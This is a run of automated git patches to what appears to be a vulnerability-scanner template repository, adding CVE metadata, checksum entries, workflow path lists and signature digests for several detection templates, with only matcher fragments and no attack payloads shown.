http/cves/2024/CVE-2024-4956.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/http/cves/2024/CVE-2024-4956.yaml b/http/cves/2024/CVE-2024-4956.yaml index a033fb849a..b7acda2a48 100644 --- a/http/cves/2024/CVE-2024-4956.yaml +++ b/http/cves/2024/CVE-2024-4956.yaml @@ -9,11 +9,15 @@ info: reference: - https://x.com/phithon_xg/status/1793517567560335428?s=46&t=GMMfJwV8rhJHdcj2TUympg - https://nvd.nist.gov/vuln/detail/CVE-2024-4956 + - https://support.sonatype.com/hc/en-us/articles/29416509323923 + - https://github.com/fkie-cad/nvd-json-data-feeds classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-4956 cwe-id: CWE-22 + epss-score: 0.00044 + epss-percentile: 0.10128 cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:* metadata: verified: true From 2451f73310e54dd43fc2da2ca92855d510962de1 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 08:52:18 +0000 Subject: [PATCH 144/847] Auto Generated New Template Addition List [Thu May 23 08:52:18 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 231cf768e5..8a2d8bda60 100644 --- a/.new-additions +++ b/.new-additions @@ -4,6 +4,7 @@ http/cves/2023/CVE-2023-35158.yaml http/cves/2023/CVE-2023-36347.yaml http/cves/2023/CVE-2023-43374.yaml http/cves/2023/CVE-2023-44813.yaml +http/cves/2023/CVE-2023-4542.yaml http/cves/2023/CVE-2023-45855.yaml http/cves/2023/CVE-2023-5991.yaml http/cves/2023/CVE-2023-6065.yaml From c74c3df5ab9fdc887e0ff428927b7f18d6b4d677 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 08:52:28 +0000 Subject: [PATCH 145/847] Auto Generated Templates Checksum [Thu May 23 08:52:28 UTC 2024] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 0bdc50aa97..ae04e62605 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3169,6 +3169,7 @@ http/cves/2023/CVE-2023-44812.yaml:ace18635165e58ee989f1932f19dcd3e6eb8a166 http/cves/2023/CVE-2023-44813.yaml:8807d3e1cce247d7ccef3184d516c55213edd2a3 http/cves/2023/CVE-2023-4521.yaml:e6cc9b5d3082e84529113381bd012c5a16a5a35b http/cves/2023/CVE-2023-45375.yaml:e9a83c1c9c55540677f50b89260a2df23d3c2c6e +http/cves/2023/CVE-2023-4542.yaml:c59a3e80096fd2edf4b7144eafb18aa5c4ff0cb8 http/cves/2023/CVE-2023-4547.yaml:a6e77eeb6c623c0317df91820a3523b09d8b05d5 http/cves/2023/CVE-2023-45542.yaml:8a9af0dceceac9809c1a2971d0600b81071ec0f2 http/cves/2023/CVE-2023-45671.yaml:dd4754dca2d4d037d911c6a7200d2a83cd81bbcf @@ -4055,7 +4056,7 @@ http/exposed-panels/metersphere-login.yaml:2a3e8e8fbd941752330c0c3b4330cd4b0ff2a http/exposed-panels/mfiles-web-detect.yaml:68378a6fd15f922fb744e6ee1dc06dbd49fd543b http/exposed-panels/microfocus-admin-server.yaml:0d58160dd2bffa2151ef010cecbace10a6f446c7 http/exposed-panels/microfocus-filr-panel.yaml:ca84f4e319c1d7abad31589ff6634365744a3242 -http/exposed-panels/microfocus-lifecycle-panel.yaml:c4e0d2706ee4069290ed8045bfceff9590c82917 +http/exposed-panels/microfocus-lifecycle-panel.yaml:e24f25ddf4c8adcddde94e8284c533410f54b8bb http/exposed-panels/microfocus-vibe-panel.yaml:5405bdcbb28cf44943d03d51c8ce86ec8ba52055 http/exposed-panels/microsoft-exchange-panel.yaml:11adf54da092d2e63804541767f06224a830c4a4 http/exposed-panels/mikrotik/mikrotik-routeros-old.yaml:305a045131b9ca81c700a79e0af7eea801440d69 @@ -4878,7 +4879,7 @@ http/exposures/logs/darkstat-detect.yaml:27249feadc758fe3a1febc93221581a4cd949f3 http/exposures/logs/development-logs.yaml:7ac242fe7f0381b896abdb10d387c98e93b3dc97 http/exposures/logs/django-debug-exposure.yaml:abd2a8bf74edb70e893b6cc3ad872f30072a32b5 http/exposures/logs/dozzle-container-logs.yaml:06ff374b87484f1f2020b179c702d0699b18a420 -http/exposures/logs/elmah-log-file.yaml:031fff182953ca9b4f82344c7d2d1b563695ccf6 +http/exposures/logs/elmah-log-file.yaml:c722d2016a3cf6d7d8cd8caac1c43ff3908906a1 http/exposures/logs/error-logs.yaml:cef1a514b4c2862367f9f7512120ca223ad31d51 http/exposures/logs/event-debug-server-status.yaml:87345798d5bc327bbef0b0dbc13d5aff09eb65e2 http/exposures/logs/exposed-glances-api.yaml:687cfc585e23fb4f129877f77d06f7b92fadec63 @@ -6832,7 +6833,7 @@ http/technologies/matrix-detect.yaml:33b6e2aef92cf34e8fdfa015ed1d7c4cbb0c9ca7 http/technologies/matrix-homeserver-detect.yaml:03f44055b1385667e1d860c9160c9b0a3b5b24b0 http/technologies/meilisearch-detect.yaml:a6496077c0c1e7d4dea5346d51d2f0863e8c0fa7 http/technologies/metatag-cms.yaml:dddeec9fe5817ce89ce12c7fb09e5702c6cf5ea7 -http/technologies/microfocus-iprint-detect.yaml:f4da103b97937df82192da15635df1182c970505 +http/technologies/microfocus-iprint-detect.yaml:df5539cd5c633a1265685ad5054f3427450030e7 http/technologies/microsoft/aspnet-version-detect.yaml:e37201ff3f26965873974a21c6bd351a7cbe851c http/technologies/microsoft/aspnetmvc-version-disclosure.yaml:8f445b5529fb0bb219994e249b2cc3aa4e868f97 http/technologies/microsoft/default-iis7-page.yaml:c4e22ee6e9c969c526ea2609a510a8e23150963d @@ -8551,7 +8552,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:9a3f5794cd87bbf6dd7263091a7856123bed136c +templates-checksum.txt:e84e8a0e4cb5322d9c376fb67af6120f6725cbe4 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From a43f62dbc12fb087f485015ab8a83c6fd4bced02 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 08:53:05 +0000 Subject: [PATCH 146/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 542807e327..833df06318 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -9,6 +9,7 @@ on: - 'http/cves/2023/CVE-2023-36347.yaml' - 'http/cves/2023/CVE-2023-43374.yaml' - 'http/cves/2023/CVE-2023-44813.yaml' + - 'http/cves/2023/CVE-2023-4542.yaml' - 'http/cves/2023/CVE-2023-45855.yaml' - 'http/cves/2023/CVE-2023-5991.yaml' - 'http/cves/2023/CVE-2023-6065.yaml' From 1dbcf8903efe570032f71315d6eb350a9eb42a97 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 08:54:11 +0000 Subject: [PATCH 147/847] Auto Template Signing [Thu May 23 08:54:11 UTC 2024] :robot: --- http/cves/2023/CVE-2023-4542.yaml | 1 + http/misconfiguration/installer/forgejo-installer.yaml | 1 + http/takeovers/flexbe-takeover.yaml | 2 +- 3 files changed, 3 insertions(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-4542.yaml b/http/cves/2023/CVE-2023-4542.yaml index b1043fadab..3d03d31d2d 100644 --- a/http/cves/2023/CVE-2023-4542.yaml +++ b/http/cves/2023/CVE-2023-4542.yaml @@ -46,3 +46,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100dc92305d342eed9bff2b49941c87cd9a974ab188c2908ff7bd7f23c4c8f0e2b70220122a54ccac0cf268d09ddecb89e8e8ac1b923dda7db8174e58415bb32e9aaea0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/forgejo-installer.yaml b/http/misconfiguration/installer/forgejo-installer.yaml index 707efcffd5..55f0d25b50 100644 --- a/http/misconfiguration/installer/forgejo-installer.yaml +++ b/http/misconfiguration/installer/forgejo-installer.yaml @@ -27,3 +27,4 @@ http: - type: status status: - 200 +# digest: 490a00463044022033d288afaf105c2c51b6caa2184977e99105303723002afee18dbc96e89b683c0220446273c73b9aff128d57d698379cad97fd8831fb899c195f954134728e652055:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/flexbe-takeover.yaml b/http/takeovers/flexbe-takeover.yaml index befd9427aa..3abeffd414 100644 --- a/http/takeovers/flexbe-takeover.yaml +++ b/http/takeovers/flexbe-takeover.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 404 -# digest: 4b0a00483046022100815bad00e060131f9f67695b3e5746f6b5feb9ac156fc15500adb76f825f1c92022100a1e5408a0f54a721f143c3b7f44e004f98dbf784584a2c3d9fff0925a0c075ad:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b0eb04edf08bb3be7f7019dc369fb2ce05a757eba9f8b0c43ad2ba6a99ce74a40220530f5f0dd9ad2ff3de1282b65b91678c0e2b2056086e1bcbae94064711075b51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 07b89e5a94e5e345e5120ed1fb1fa6e73d87bfcf Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 08:54:17 +0000 Subject: [PATCH 148/847] Auto Generated New Template Addition List [Thu May 23 08:54:17 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 8a2d8bda60..cd91d16988 100644 --- a/.new-additions +++ b/.new-additions @@ -1,6 +1,7 @@ http/cnvd/2017/CNVD-2017-06001.yaml http/cves/2023/CVE-2023-29827.yaml http/cves/2023/CVE-2023-35158.yaml +http/cves/2023/CVE-2023-36284.yaml http/cves/2023/CVE-2023-36347.yaml http/cves/2023/CVE-2023-43374.yaml http/cves/2023/CVE-2023-44813.yaml @@ -12,6 +13,7 @@ http/cves/2024/CVE-2024-0200.yaml http/cves/2024/CVE-2024-1561.yaml http/cves/2024/CVE-2024-3097.yaml http/cves/2024/CVE-2024-33288.yaml +http/cves/2024/CVE-2024-4956.yaml http/default-logins/softether/softether-vpn-default-login.yaml http/exposed-panels/ackee-panel.yaml http/exposed-panels/craftercms-panel.yaml From c73d04bef72e8b10572f9d8ac0c455d6087e3a61 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 08:54:33 +0000 Subject: [PATCH 150/847] Auto Generated Templates Checksum [Thu May 23 08:54:33 UTC 2024] :robot: --- templates-checksum.txt | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ae04e62605..45e79bfa68 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3076,6 +3076,7 @@ http/cves/2023/CVE-2023-35843.yaml:f935ab47792f5daffb747a60564df573aea5b874 http/cves/2023/CVE-2023-35844.yaml:07feb73ed36aeaec344d8b1998c70aee8f8d9bd9 http/cves/2023/CVE-2023-35885.yaml:957a28f9f3f996307f32ae59a9f525b604092de2 http/cves/2023/CVE-2023-36144.yaml:152d855d93a2f729ac8765c3860a38fba7020624 +http/cves/2023/CVE-2023-36284.yaml:31cd0a9c8a9cef3a610f7481f8c2eb08a6e72161 http/cves/2023/CVE-2023-36287.yaml:95776d1420538a12d408f6ccd81aa83dc7d21a12 http/cves/2023/CVE-2023-36289.yaml:3d52b899da5c618c6e22f6d189e9be7ec5008206 http/cves/2023/CVE-2023-36306.yaml:3251b16b3918faf9a3c2ca2b070c0f205fc36e75 @@ -3301,6 +3302,7 @@ http/cves/2024/CVE-2024-33724.yaml:22f067dc8bffa65e58284ba200cb9d7abb06d0d0 http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c http/cves/2024/CVE-2024-4040.yaml:378a6ad71096d7285f0d1b2b51e2daee83e19a82 http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b +http/cves/2024/CVE-2024-4956.yaml:8fdaa2998b1f62c6e8fcfce8b198fa940cb2572f http/default-logins/3com/3Com-wireless-default-login.yaml:7c816fc8c0b14d7f9c5b111259ca75c4f96a4671 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda @@ -8552,7 +8554,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e84e8a0e4cb5322d9c376fb67af6120f6725cbe4 +templates-checksum.txt:913f630fde1f2c06c856ce79687ccd1f699ebd05 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e00272178ae9f1d24af8a22a52f4646f7a5fac52 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 08:55:02 +0000 Subject: [PATCH 151/847] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 833df06318..2da568ff08 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -6,6 +6,7 @@ on: - 'http/cnvd/2017/CNVD-2017-06001.yaml' - 'http/cves/2023/CVE-2023-29827.yaml' - 'http/cves/2023/CVE-2023-35158.yaml' + - 'http/cves/2023/CVE-2023-36284.yaml' - 'http/cves/2023/CVE-2023-36347.yaml' - 'http/cves/2023/CVE-2023-43374.yaml' - 'http/cves/2023/CVE-2023-44813.yaml' @@ -17,6 +18,7 @@ on: - 'http/cves/2024/CVE-2024-1561.yaml' - 'http/cves/2024/CVE-2024-3097.yaml' - 'http/cves/2024/CVE-2024-33288.yaml' + - 'http/cves/2024/CVE-2024-4956.yaml' - 'http/default-logins/softether/softether-vpn-default-login.yaml' - 'http/exposed-panels/ackee-panel.yaml' - 'http/exposed-panels/craftercms-panel.yaml' From b2f108c4abfe0ce26d8082e0e0b05dac7b202a4e Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 08:55:25 +0000 Subject: [PATCH 152/847] Auto Generated New Template Addition List [Thu May 23 08:55:25 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index cd91d16988..cae8693827 100644 --- a/.new-additions +++ b/.new-additions @@ -40,6 +40,7 @@ http/misconfiguration/installer/moosocial-installer.yaml http/misconfiguration/installer/octoprint-installer.yaml http/misconfiguration/installer/openfire-setup.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml +http/misconfiguration/installer/qloapps-installer.yaml http/misconfiguration/installer/trilium-notes-installer.yaml http/misconfiguration/installer/wiki-js-installer.yaml http/misconfiguration/installer/xbackbone-installer.yaml From 97bac1461924bdf3d80011b1922d48d46d9dced8 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 08:55:32 +0000 Subject: [PATCH 153/847] Auto Generated Templates Checksum [Thu May 23 08:55:31 UTC 2024] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 45e79bfa68..06d2d909fe 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3170,7 +3170,7 @@ http/cves/2023/CVE-2023-44812.yaml:ace18635165e58ee989f1932f19dcd3e6eb8a166 http/cves/2023/CVE-2023-44813.yaml:8807d3e1cce247d7ccef3184d516c55213edd2a3 http/cves/2023/CVE-2023-4521.yaml:e6cc9b5d3082e84529113381bd012c5a16a5a35b http/cves/2023/CVE-2023-45375.yaml:e9a83c1c9c55540677f50b89260a2df23d3c2c6e -http/cves/2023/CVE-2023-4542.yaml:c59a3e80096fd2edf4b7144eafb18aa5c4ff0cb8 +http/cves/2023/CVE-2023-4542.yaml:d7b83fe18ec05683bd8001dcb749dd505d93c3ff http/cves/2023/CVE-2023-4547.yaml:a6e77eeb6c623c0317df91820a3523b09d8b05d5 http/cves/2023/CVE-2023-45542.yaml:8a9af0dceceac9809c1a2971d0600b81071ec0f2 http/cves/2023/CVE-2023-45671.yaml:dd4754dca2d4d037d911c6a7200d2a83cd81bbcf @@ -5411,7 +5411,7 @@ http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287f http/misconfiguration/installer/espocrm-installer.yaml:fccc8f34a7a3101fe1171472726b160881408b3a http/misconfiguration/installer/eyoucms-installer.yaml:a39da2ac7d242b481b6cebd70a0b4b89317a903b http/misconfiguration/installer/facturascripts-installer.yaml:cba5490847e989a892fef13fdcd1ae9f2c01dbea -http/misconfiguration/installer/forgejo-installer.yaml:7bb822ad620aba636554fd7151554a76b8bfa48a +http/misconfiguration/installer/forgejo-installer.yaml:4438f54db2524ab11b7d2f0544d3f75c89feb83a http/misconfiguration/installer/froxlor-installer.yaml:4e750156a862eba74eb7edf2efa7b91fb7b273dc http/misconfiguration/installer/geniusocean-installer.yaml:d18cbff0dd385dbab1c44876c8ac2587116fef1a http/misconfiguration/installer/getsimple-installation.yaml:5673a1203b9080ff329c3fe251cb799e41d0432e @@ -5467,6 +5467,7 @@ http/misconfiguration/installer/pmm-installer.yaml:32509e9fe33719aacf310d33d0a40 http/misconfiguration/installer/posteio-installer.yaml:d4662ebf401e1c2128570f674b63ccf25970599b http/misconfiguration/installer/prestashop-installer.yaml:5011384078f8708b8ec90caa52c299ecb922dea5 http/misconfiguration/installer/processwire-installer.yaml:77810f7d222228fb1c1afb38560135f4b7718d24 +http/misconfiguration/installer/qloapps-installer.yaml:2b6a9b4c991d5c1590fe3e66ecee08adbbcf655e http/misconfiguration/installer/redash-installer.yaml:1087870f7e1826761d0ecbfbbc60528e43e028e0 http/misconfiguration/installer/ruckus-smartzone-install.yaml:48c25f2717f5e5a62abc32cc50f61474534259c7 http/misconfiguration/installer/ruckus-unleashed-install.yaml:55ab5a07d38c07dc39480173dbcbbbcb4e297e5d @@ -6532,7 +6533,7 @@ http/takeovers/canny-takeover.yaml:cc5a760aa65559322a94344f7add91e523a63db1 http/takeovers/cargo-takeover.yaml:42db7ee4771a5cbddc6e2b8072070c583d6fd452 http/takeovers/cargocollective-takeover.yaml:dde78512f960c62936577c19801b1446ec65d5d3 http/takeovers/clever-takeover.yaml:f4d45f5b42f376d3258d2b4140a9dad14e25cd87 -http/takeovers/flexbe-takeover.yaml:bd450946fb6237dbf99f21409082be3ebb6d295b +http/takeovers/flexbe-takeover.yaml:e447e7c68c38eea9703f93af0b5560f9e10211ed http/takeovers/frontify-takeover.yaml:e7700c7ad9bb5a761d8bd1395c6a5360c91b3dcb http/takeovers/gemfury-takeover.yaml:69d22f9c935be01d0ebad5946a9766eafe12fc68 http/takeovers/getresponse-takeover.yaml:5eff48c5b7d27eeede3d2e7fba1a8a6f314fa9bd @@ -8554,7 +8555,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:913f630fde1f2c06c856ce79687ccd1f699ebd05 +templates-checksum.txt:a8e7df8690269ac44f7394cae540519848785f62 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7d4f403edffa1d43f18fe960eca9adb07f3ade92 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 08:56:10 +0000 Subject: [PATCH 154/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 2da568ff08..1db8682e6e 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -45,6 +45,7 @@ on: - 'http/misconfiguration/installer/octoprint-installer.yaml' - 'http/misconfiguration/installer/openfire-setup.yaml' - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' + - 'http/misconfiguration/installer/qloapps-installer.yaml' - 'http/misconfiguration/installer/trilium-notes-installer.yaml' - 'http/misconfiguration/installer/wiki-js-installer.yaml' - 'http/misconfiguration/installer/xbackbone-installer.yaml' From 0ce959548fa691633e8ce005c11c09e6b075064d Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 08:57:11 +0000 Subject: [PATCH 155/847] Auto Template Signing [Thu May 23 08:57:11 UTC 2024] :robot: --- http/cves/2023/CVE-2023-36284.yaml | 1 + http/cves/2024/CVE-2024-4956.yaml | 1 + http/misconfiguration/installer/qloapps-installer.yaml | 1 + 3 files changed, 3 insertions(+) diff --git a/http/cves/2023/CVE-2023-36284.yaml b/http/cves/2023/CVE-2023-36284.yaml index 92667d236c..dacbb3caae 100644 --- a/http/cves/2023/CVE-2023-36284.yaml +++ b/http/cves/2023/CVE-2023-36284.yaml @@ -57,3 +57,4 @@ http: - duration>=5 - 'contains(body, "<span>Guest Information")' condition: and +# digest: 490a0046304402202f3f74b2aa2805006791102f5519990f7d0e4824ad34b3c4abeed275fedb7caa02204b28c27e4cdb49f6286322ce20f2009ee727d644cfaa0880970674e4487400e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-4956.yaml b/http/cves/2024/CVE-2024-4956.yaml index b7acda2a48..2481ee7b18 100644 --- a/http/cves/2024/CVE-2024-4956.yaml +++ b/http/cves/2024/CVE-2024-4956.yaml @@ -39,3 +39,4 @@ http: - contains(header, "application/octet-stream") - status_code == 200 condition: and +# digest: 4b0a00483046022100d04cb6a8b4f715247f0046035995368961f1e380721d9a061a68fbcdf728ad70022100c807dbccfb625a6ee33ef8333433686a5a437f066cc9ecdd6c8a5aac4923bed9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/qloapps-installer.yaml b/http/misconfiguration/installer/qloapps-installer.yaml index 87064f012c..ac329ec307 100644 --- a/http/misconfiguration/installer/qloapps-installer.yaml +++ b/http/misconfiguration/installer/qloapps-installer.yaml @@ -30,3 +30,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100f3866d0a7114f2638451a3c05ef701c0dc2fc2e0d5a16f36b427743f28b16763022100ac4f98fcc0ddbdb5e562b07861b45a99fa1d3525cb1d8d031d3708a4db77558c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From c36d1b9ad9a530202c7119fe811f2c69ec145981 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 09:32:12 +0000 Subject: [PATCH 156/847] Auto Generated Templates Checksum [Thu May 23 09:32:12 UTC 2024] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 06d2d909fe..7bffb4c71f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3076,7 +3076,7 @@ http/cves/2023/CVE-2023-35843.yaml:f935ab47792f5daffb747a60564df573aea5b874 http/cves/2023/CVE-2023-35844.yaml:07feb73ed36aeaec344d8b1998c70aee8f8d9bd9 http/cves/2023/CVE-2023-35885.yaml:957a28f9f3f996307f32ae59a9f525b604092de2 http/cves/2023/CVE-2023-36144.yaml:152d855d93a2f729ac8765c3860a38fba7020624 -http/cves/2023/CVE-2023-36284.yaml:31cd0a9c8a9cef3a610f7481f8c2eb08a6e72161 +http/cves/2023/CVE-2023-36284.yaml:8b045d86f4ab7fd4d1dfb171450a2cc5bc9d270c http/cves/2023/CVE-2023-36287.yaml:95776d1420538a12d408f6ccd81aa83dc7d21a12 http/cves/2023/CVE-2023-36289.yaml:3d52b899da5c618c6e22f6d189e9be7ec5008206 http/cves/2023/CVE-2023-36306.yaml:3251b16b3918faf9a3c2ca2b070c0f205fc36e75 @@ -3302,7 +3302,7 @@ http/cves/2024/CVE-2024-33724.yaml:22f067dc8bffa65e58284ba200cb9d7abb06d0d0 http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c http/cves/2024/CVE-2024-4040.yaml:378a6ad71096d7285f0d1b2b51e2daee83e19a82 http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b -http/cves/2024/CVE-2024-4956.yaml:8fdaa2998b1f62c6e8fcfce8b198fa940cb2572f +http/cves/2024/CVE-2024-4956.yaml:930d1f49e8fdefd809f7aea2f0dddc2f3a160d09 http/default-logins/3com/3Com-wireless-default-login.yaml:7c816fc8c0b14d7f9c5b111259ca75c4f96a4671 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda @@ -5418,6 +5418,7 @@ http/misconfiguration/installer/getsimple-installation.yaml:5673a1203b9080ff329c http/misconfiguration/installer/gibbon-installer.yaml:c22815fca903475c70deeecb36bb5ca4bdde2283 http/misconfiguration/installer/gitea-installer.yaml:5e6a8a0d61e3cf52bdaeb96c7a1784a046292e7e http/misconfiguration/installer/gogs-installer.yaml:761e7ee7354915c029670f36c1360b8d8bb97a4d +http/misconfiguration/installer/growi-installer.yaml:743890ea534f511369a9d5e86d361189ac9e240b http/misconfiguration/installer/ids-skills-installer.yaml:ff7fee92596ae2212f48a0b75bfce6defd2f8baa http/misconfiguration/installer/impresspages-installer.yaml:a202181818bcfe8005a744f81027dc06de05dc40 http/misconfiguration/installer/imprivata-installer.yaml:876cea672f3efc0085a779a6d8c9305c994a2ea3 @@ -5467,7 +5468,7 @@ http/misconfiguration/installer/pmm-installer.yaml:32509e9fe33719aacf310d33d0a40 http/misconfiguration/installer/posteio-installer.yaml:d4662ebf401e1c2128570f674b63ccf25970599b http/misconfiguration/installer/prestashop-installer.yaml:5011384078f8708b8ec90caa52c299ecb922dea5 http/misconfiguration/installer/processwire-installer.yaml:77810f7d222228fb1c1afb38560135f4b7718d24 -http/misconfiguration/installer/qloapps-installer.yaml:2b6a9b4c991d5c1590fe3e66ecee08adbbcf655e +http/misconfiguration/installer/qloapps-installer.yaml:4cd9381f76856e1537af119a837b6e303bc97217 http/misconfiguration/installer/redash-installer.yaml:1087870f7e1826761d0ecbfbbc60528e43e028e0 http/misconfiguration/installer/ruckus-smartzone-install.yaml:48c25f2717f5e5a62abc32cc50f61474534259c7 http/misconfiguration/installer/ruckus-unleashed-install.yaml:55ab5a07d38c07dc39480173dbcbbbcb4e297e5d @@ -8555,7 +8556,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:a8e7df8690269ac44f7394cae540519848785f62 +templates-checksum.txt:389baee3ddcffef703e3fd7ecba20ec318c44aa8 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 311d3d623f656f7286107630513123f02c533317 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 09:33:54 +0000 Subject: [PATCH 157/847] Auto Template Signing [Thu May 23 09:33:54 UTC 2024] :robot: --- http/misconfiguration/installer/growi-installer.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/installer/growi-installer.yaml b/http/misconfiguration/installer/growi-installer.yaml index 905628e1c0..14ff7eaaf4 100644 --- a/http/misconfiguration/installer/growi-installer.yaml +++ b/http/misconfiguration/installer/growi-installer.yaml @@ -27,3 +27,4 @@ http: - type: status status: - 